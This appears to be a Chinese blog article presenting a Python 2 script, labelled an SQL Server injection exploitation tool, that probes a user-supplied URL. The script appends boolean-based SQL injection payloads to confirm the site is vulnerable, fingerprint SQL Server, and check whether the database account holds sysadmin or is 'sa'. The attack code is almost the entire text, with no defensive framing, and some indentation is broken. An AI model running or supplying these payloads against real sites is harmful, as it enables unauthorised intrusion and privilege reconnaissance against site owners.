Python编写检测数据库SA用户的方法

782次阅读  |  发布于5年以前

本文讲述一个用Python写的小程序,用于有注入点的链接,以检测当前数据库用户是否为sa,详细代码如下:


    # Code by zhaoxiaobu Email: little.bu@hotmail.com  
    #-*- coding: UTF-8 -*-  
    from sys import exit  
    from urllib import urlopen  
    from string import join,strip  
    from re import search  

    def is_sqlable(): 
      sql1="%20and%201=2" 
      sql2="%20and%201=1" 
      urlfile1=urlopen(url+sql1) 
      urlfile2=urlopen(url+sql2) 
      htmlcodes1=urlfile1.read() 
      htmlcodes2=urlfile2.read() 
      if not search(judge,htmlcodes1) and search(judge,htmlcodes2): 
      print "[信息]恭喜!这个URL是有注入漏洞的!n" 
      print "[信息]现在判断数据库是否是SQL Server,请耐心等候....."  
      is_SQLServer() 
      else: 
      print "[错误]你确定这个URL能用?换个别的试试吧!n"

    def is_SQLServer(): 
      sql = "%20and%20exists%20(select%20*%20from%20sysobjects)" 
      urlfile=urlopen(url+sql) 
      htmlcodes=urlfile.read() 
      if not search(judge,htmlcodes): 
      print "[错误]数据库好像不是SQL Server的!n" 
      else: 
      print "[信息]确认是SQL Server数据库!n" 
      print "[信息]开始检测当前数据库用户权限,请耐心等待......" 
      is_sysadmin() 


    def is_sysadmin():  
      sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))" 
      urlfile = urlopen(url+sql)  
      htmlcodes = urlfile.read()  
      if not search(judge,htmlcodes):  
        print "[错误]当前数据库用户不具有sysadmin权限!n" 
      else:  
        print "[信息]当前数据库用户具有sysadmin权限!n" 
        print "[信息]检测当前用户是不是SA,请耐心等待......" 
        is_sa()  

    def is_sa():  
      sql = "%20and%20'sa'=(select%20System_user)"; 
      urlfile = urlopen(url+sql)  
      htmlcodes = urlfile.read()  
      if not search(judge,htmlcodes):  
        print "[错误]当前数据库用户不是SA!n" 
      else:  
        print "[信息]当前数据库用户是SA!n" 

    print "n########################################################################n"  
    print "            ^o^SQL Server注入利用工具^o^     "  
    print "           Email: little.bu@hotmail.comn"  
    print "========================================================================";  
    url = raw_input('[信息]请输入一个可能有注入漏洞的链接!nURL:')  
    if url == '':  
      print "[错误]提供的URL必须具有 '.asp?xxx=' 这样的格式"  
      exit(1)  

    judge = raw_input("[信息]请提供一个判断字符串.n判断字符串:")  
    if judge == '':  
      print "[错误]判断字符串不能为空!"  
      exit(1)  

    is_sqlable()

Copyright© 2013-2020

All Rights Reserved 京ICP备2023019179号-8